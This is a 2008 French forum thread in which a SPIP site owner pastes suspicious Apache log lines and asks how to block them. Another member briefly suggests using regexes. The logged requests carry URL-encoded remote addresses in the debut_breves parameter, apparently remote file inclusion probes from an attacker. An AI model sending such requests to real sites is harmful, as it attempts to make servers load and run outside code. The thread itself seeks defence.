inquiet, logs suspects

tofm2 · 4 Mars 2008

Bonjour

depuis quelque temps, je tombe sur des logs suspects sur un de mes sites développé sous spip

(à voir sur écran large)

nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&amp;amp;amp;amp;debut_breves=5&amp;amp;amp;debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&amp;amp;debut_breves=5&amp;debut_breves=5&debut_breves=5 HTTP/1.0" 200 10536 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&amp;amp;amp;amp;debut_breves=5&amp;amp;amp;debut_breves=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&amp;amp;debut_breves=5&amp;debut_breves=5&debut_breves=5 HTTP/1.0" 200 10515 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:01 +0100] "GET /spip.php?breve2&amp;amp;amp;amp;debut_breves=5&amp;amp;amp;debut_breves=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F&amp;amp;debut_breves=5&amp;debut_breves=5&debut_breves=5 HTTP/1.0" 200 10540 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

ce qui m'inquiète c'est les codes ascii qui remplacent les caractères / et :

des fois j'ai des url de 3 kms avec des tentatives d'injection de code et d'URL

nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:32 +0100] "GET /spip.php?breve2&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;debut_breves=5&amp;amp;amp;debut_breves=5&amp;amp;debut_breves=5&amp;debut_breves=5&debut_breves=5 HTTP/1.0" 200 11315 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:33 +0100] "GET /spip.php?breve2&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;debut_breves=5&amp;amp;amp;debut_breves=5&amp;amp;debut_breves=5&amp;debut_breves=5&debut_breves=5 HTTP/1.0" 200 11316 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:34 +0100] "GET /spip.php?breve2&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;amp;debut_breves=5&amp;amp;amp;amp;debut_breves=5&amp;amp;amp;debut_breves=5&amp;amp;debut_breves=5&amp;debut_breves=5&debut_breves=5 HTTP/1.0" 200 11303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

QUe penser de cette activité, sachant que si je tape cette URL dans la barre d'adresse de mon navigateur, je n'ai rien de particulier que l'article correspondant (code 200)

Y a t'il un moyen de parer cette activité, avec .htaccess, une rewrite rule ou je ne sais pas..

merci de votre attention.

Lomax7 · 4 Mars 2008

Si tu as des pages dont les url sont sensibles, tu peux employer des regex,
c'est simple et efficace.

tofm2 · 4 Mars 2008

Lomax7 a dit:
Si tu as des pages dont les url sont sensibles, tu peux employer des regex,
c'est simple et efficace.

oui, mais entre autres ??

à quoi correspondent ces logs, j'en ai de plus en plus ...